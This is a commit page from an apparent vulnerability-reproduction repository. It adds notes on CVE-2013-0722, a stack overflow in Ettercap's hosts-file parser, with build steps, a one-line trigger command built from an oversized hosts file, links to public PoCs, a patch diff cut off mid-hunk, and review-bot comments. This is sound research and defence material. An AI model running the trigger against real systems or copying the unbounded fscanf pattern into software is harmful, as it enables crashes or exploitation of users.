add information for CVE-2013-0722
mudongliang committed May 19, 2018
1 parent a1c67f8 commit 89592c1
Showing 2 changed files with 50 additions and 1 deletion.
49 changes: 49 additions & 0 deletions CVE-2013-0722/README.md
@@ -2,14 +2,63 @@


## Experiment Environment ## Experiment Environment


Ubuntu 14.04.5

Kali Linux

Ubuntu 12.04

## INSTALL & Configuration ## INSTALL & Configuration


```
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2013-0722/ettercap-0.7.5.1.tar.gz
tar -xvf ettercap-0.7.5.1.tar.gz
cd ettercap-0.7.5.1
mkdir build
cd build
cmake ../
make
```


## Problems in Installation & Configuration ## Problems in Installation & Configuration



## How to trigger vulnerability ## How to trigger vulnerability


```
cd src/
sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow
```

## PoCs ## PoCs


[Ettercap 0.7.5.1 - Stack Overflow](https://www.exploit-db.com/exploits/23945/)

[Ettercap Multiple Stack Buffer Overflow Vulnerabilities](https://www.securityfocus.com/bid/57175/exploit) **Note:** this poc description has some unmalformed html element.

## Vulnerability Patch ## Vulnerability Patch


### Root Cause

A stack-based buffer overflow was reported [1],[2] in Ettercap <= 0.7.5.1. A boundary error within the scan_load_hosts() function (in src/ec_scan.c), when parsing entries from a hosts list, could be exploited to cause a stack-based buffer overflow via an overly long entry. In order to exploit this, a user must be tricked into loading a malicious host file.

### Stack Trace

### Patch

--- EC-vulnerable/src/ec_scan.c
+++ EC-fixed/src/ec_scan.c
@@ -630,7 +630,7 @@
for (nhosts = 0; !feof(hf); nhosts++) {
int proto;

- if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||
+ if (fscanf(hf, "%"EC_TOSTRING(MAX_ASCII_ADDR_LEN)"s %"EC_TOSTRING(ETH_ASCII_ADDR_LEN)"s %"EC_TOSTRING(MAX_HOSTNAME_LEN)"s\n", ip, mac, name) != 3 ||
*ip == '#' || *mac == '#' || *name == '#')
continu

## References ## References

[CVE-2013-0722 ettercap: stack-based buffer overflow when parsing hosts list](https://bugzilla.redhat.com/show_bug.cgi?id=894092)
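Review bot: the embedded diff under "### Patch" is truncated at `continu` (the `continue;` statement and the remainder of the hunk are missing), so the fix as shown cannot be applied or reviewed in full; paste the complete hunk. In the same file, the "Problems in Installation & Configuration" and "Stack Trace" sections are empty, the Root Cause paragraph cites [1],[2] while the References section lists a single entry, and "unmalformed html element" should read "malformed html element". In the trigger command `sudo ruby -e'puts"a"*2000' > overflow && ...`, the redirection is performed by the invoking shell rather than by sudo, so the first `sudo` has no effect on where or as whom the file is written and can be dropped. For the fscanf change itself, confirm that each `%Ns` width is at most one less than the size of the array it fills (`ip`, `mac`, `name`), since scanf stores up to N characters plus a terminating NUL.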
2 changes: 1 addition & 1 deletion README.md
@@ -147,7 +147,7 @@ If the vulnerability has both CVE-ID and EDB-ID, CVE-ID is preferred as its dire
- [x] CVE-2013-0221 - [x] CVE-2013-0221
- [x] CVE-2013-0222 - [x] CVE-2013-0222
- [x] CVE-2013-0223 - [x] CVE-2013-0223
- [ ] CVE-2013-0722 - [x] CVE-2013-0722
- [x] CVE-2013-2028 - [x] CVE-2013-2028
- [ ] CVE-2013-2131 - [ ] CVE-2013-2131
- [ ] CVE-2013-3724 - [ ] CVE-2013-3724
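Review bot: checking CVE-2013-0722 as `[x]` marks the entry complete, but the CVE-2013-0722/README.md added in this same commit still has empty "Problems in Installation & Configuration" and "Stack Trace" sections and a patch excerpt cut off at `continu`; either fill those in here or leave the box unchecked until the entry matches the other `[x]` items.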
